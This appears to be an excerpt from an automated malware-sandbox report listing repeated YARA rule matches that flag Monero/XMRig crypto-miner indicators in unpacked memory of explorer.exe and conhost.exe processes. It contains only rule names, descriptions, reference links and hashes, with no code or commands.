              Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1, date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE, Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
